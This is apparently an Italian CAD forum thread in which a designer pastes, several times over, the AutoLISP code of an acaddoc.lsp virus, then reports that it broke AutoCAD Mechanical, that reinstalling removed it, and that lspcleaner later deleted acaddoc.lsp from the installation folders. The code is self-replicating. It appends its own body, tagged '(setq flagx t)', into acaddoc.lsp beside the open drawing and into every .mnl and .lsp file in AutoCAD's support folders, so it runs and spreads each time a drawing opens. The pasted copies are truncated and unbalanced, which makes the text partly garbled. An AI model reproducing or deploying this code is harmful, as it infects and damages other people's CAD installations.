(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)

(setq flagx t)
(setq bz "(setq flagx t)")
(defun app(source target bz / flag flag1 wjm wjm1 text)
(setq flag nil)
(setq flag1 t)
(if (findfile target)
(setq wjm1 (open target "r"))
(while (setq text (read-line wjm1))
(if (= text bz) (setq flag1 nil))
(close wjm1)
(if flag1
(setq wjm (open source "r"))
(setq wjm1 (open target "a"))
(write-line (chr 13) wjm1)
(while (setq text (read-line wjm))
(if (= text bz) (setq flag t))
(if flag
(write-line text wjm1)
(close wjm1)
(close wjm)
(setvar "cmdecho" 0)
(setq acadmnl (findfile "acad.mnl"))
(setq acadmnlpath (vl-filename-directory acadmnl))
(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl"))
(setq mnlnum (length mnlfilelist))
(setq acadexe (findfile "acad.exe"))
(setq acadpath (vl-filename-directory acadexe))
(setq support (strcat acadpath "\\support"))
(setq lspfilelist (vl-directory-files support "*.lsp"))
(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))
(setq lspnum (length lspfilelist))
(setq dwgname (getvar "dwgname"))
(setq dwgpath (findfile dwgname))
(if dwgpath
(setq acaddocpath (vl-filename-directory dwgpath))
(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(app mnlfilename acaddocfile bz)
(app acaddocfile mnlfilename bz)
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(app lspfilename acaddocfile bz)
(app acaddocfile lspfilename bz)
(setq lspn (1+ lspn))
(setq mnln 0)
(while (< mnln mnlnum)
(setq mnlfilename (strcat acadmnlpath "" (nth mnln mnlfilelist)))
(setq mnln1 0)
(while (< mnln1 mnlnum)
(setq mnlfilename1 (strcat acadmnlpath "" (nth mnln1 mnlfilelist)))
(app mnlfilename mnlfilename1 bz)
(setq mnln1 (1+ mnln1))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app mnlfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln (1+ mnln))
(setq lspn 0)
(while (< lspn lspnum)
(setq lspfilename (strcat support "" (nth lspn lspfilelist)))
(setq lspn1 0)
(while (< lspn1 lspnum)
(setq lspfilename1 (strcat support "" (nth lspn1 lspfilelist)))
(app lspfilename lspfilename1 bz)
(setq lspn1 (1+ lspn1))
(setq mnln1 0)


Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
lo strano è che aprendo quei file mi sputtana proprio autocad mechanical...se faccio rec per fare rettangolo non lo fa più!!!


Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
leggendo ho letto che se genera per ogni file un acadoc.lsp è un VIRUS!!!!!


Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
ok risolto reinstallando e dicendo al tipo che mi ha mandato i files che c'era il virus . cmq grazie se mi si ripresenta non reinstallo e provo la tua soluzione.

quindi dimmi è normale avere nei file di installazione di autocad acaddoc.lsp?


Utente Standard
Professione: PROGETTISTA
Software: Solidworks 2016- autocad mech 2013-2017
Regione: lombardia
oggi con lspcleaner mi ha trovato nella cartelle dei file di installazione il file acaddoc.lsp e altri lisp. lo ha cancellato! è possibile??

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